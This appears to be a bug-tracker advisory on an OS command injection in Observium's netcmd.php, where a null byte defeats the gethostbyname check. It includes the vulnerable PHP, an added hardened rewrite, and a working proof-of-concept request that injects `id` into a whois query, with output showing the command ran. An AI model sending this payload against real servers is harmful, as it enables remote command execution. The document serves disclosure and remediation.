Details
- Bug
- Resolution: Fixed
- Major
- None
- Community Edition
Description
It is possible to inject arbitrary OS-level shell commands through a vulnerability in the netcmd.php file.
The code tries to resolve the IP address to use in a query. If an attacker supplies an invalid IP address, a hostname lookup is performed using gethostbyname. If gethostbyname fails to return a valid IP address, it returns the unmodified hostname; in that case netcmd.php does not execute the requested command. This is a security measure. However, it is possible to make gethostbyname fail the lookup and still return a modified string, thus bypassing the security check: if the input contains a null byte, gethostbyname only returns the characters before the null byte, so the returned value differs from the original input and the `$ip != $host` check passes.
netcmd.php:

```php
$host = $_GET['query'];
$ip = '';

if (Net_IPv4::validateIP($host))
{
    $ip = $host;
    $ip_version = 4;
}
elseif (Net_IPv6::checkIPv6($host))
{
    $ip = $host;
    $ip_version = 6;
}
else
{
    // gethostbyname() returns $host unchanged when the lookup fails, so the
    // comparison below is intended to stop unresolvable input from being used.
    $ip = gethostbyname($host);
    if ($ip && $ip != $host)
    {
        $ip_version = 4;
    } else {
        $ip = gethostbyname6($host, FALSE);
        if ($ip)
        {
            $ip_version = 6;
        }
    }
}
```
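The same resolution step with the safeguard applied to the resolver's result instead of to a comparison with the input, as an added example that is neither Observium's code nor its fix. The helper names `resolve_query_to_ip` and `build_whois_command` are assumptions; only standard PHP functions are used.

```php
<?php
// Added example (not Observium's code): resolve a user-supplied query to an
// IP address in a way that a truncated or otherwise "modified" lookup result
// cannot bypass. resolve_query_to_ip() and build_whois_command() are
// hypothetical names chosen for this example.

function resolve_query_to_ip(string $query): ?array
{
    // 1. Allowlist the input before any lookup. This rejects NUL bytes,
    //    quotes, backticks and whitespace outright instead of relying on the
    //    resolver to choke on them.
    if (strlen($query) === 0 || strlen($query) > 253) {
        return null;
    }
    if (!preg_match('/^[A-Za-z0-9.:\-]+$/', $query)) {
        return null;
    }

    // 2. IP literals are accepted only after validation.
    if (filter_var($query, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) !== false) {
        return ['ip' => $query, 'version' => 4];
    }
    if (filter_var($query, FILTER_VALIDATE_IP, FILTER_FLAG_IPV6) !== false) {
        return ['ip' => $query, 'version' => 6];
    }

    // 3. Hostnames are resolved, and the *result* is validated as an IP
    //    address. gethostbyname() returns its argument unchanged on failure;
    //    checking "did the result change?" (the original $ip != $host test)
    //    is what the NUL-byte truncation defeated, so that test is not used.
    $ip = gethostbyname($query);
    if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) !== false) {
        return ['ip' => $ip, 'version' => 4];
    }
    foreach (dns_get_record($query, DNS_AAAA) ?: [] as $rec) {
        if (isset($rec['ipv6'])
            && filter_var($rec['ipv6'], FILTER_VALIDATE_IP, FILTER_FLAG_IPV6) !== false) {
            return ['ip' => $rec['ipv6'], 'version' => 6];
        }
    }
    return null;
}

function build_whois_command(string $query): ?string
{
    $resolved = resolve_query_to_ip($query);
    if ($resolved === null) {
        return null;   // refuse to build a command for unresolvable input
    }
    // Even a validated IP is passed through escapeshellarg() so the shell
    // only ever sees it as a single literal argument.
    return 'whois ' . escapeshellarg($resolved['ip']);
}

// Constructed inputs for a quick self-check:
var_dump(build_whois_command('192.0.2.10'));   // a valid literal is accepted
var_dump(build_whois_command("\"`id`\"\0"));   // the PoC payload is rejected before any lookup
```

The allowlist in step 1 is deliberately strict (no underscores, no IDN); the point is that the decision to run a command rests on the resolved value being a well-formed IP address, not on whether the resolver happened to alter the input. escapeshellarg() is the second, independent layer in case the first is ever loosened.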
The following request can be used as a proof of concept:
http://observium/netcmd.php?cmd=whois&query=%22%60id%60%22%00
The URL-decoded query string: "`id`"%00

The whois response then contains the output of the injected command (the `uid=33(www-data)` line):

```
#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/whois_tou.html
#
# If you see inaccuracies in the results, please report at
# http://www.arin.net/public/whoisinaccuracy/index.xhtml
#


#
# Query terms are invalid. Please specify a record type.
#
#

No match found for uid=33(www-data) gid=33(www-data) groups=33(www-data).


#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/whois_tou.html
#
# If you see inaccuracies in the results, please report at
# http://www.arin.net/public/whoisinaccuracy/index.xhtml
#
```